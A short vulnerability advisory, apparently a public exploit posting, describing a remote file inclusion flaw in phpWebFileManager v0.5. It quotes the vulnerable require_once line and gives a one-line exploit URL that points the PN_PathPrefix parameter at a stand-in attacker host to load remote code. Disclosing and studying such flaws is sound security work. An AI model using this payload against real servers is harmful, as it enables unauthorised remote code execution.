phpWebFileManager version 0.5 suffers from a remote file inclusion vulnerability.
bb0122786b4a6b5d59265313cd7d8caf05332d3860e0fa38b78b33f16b0647f3
-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...
Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined
-------------------------------------------------------------------------------------------------------------------
Exploit: index.php?PN_PathPrefix=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Ajann,Dumenci,Str0ke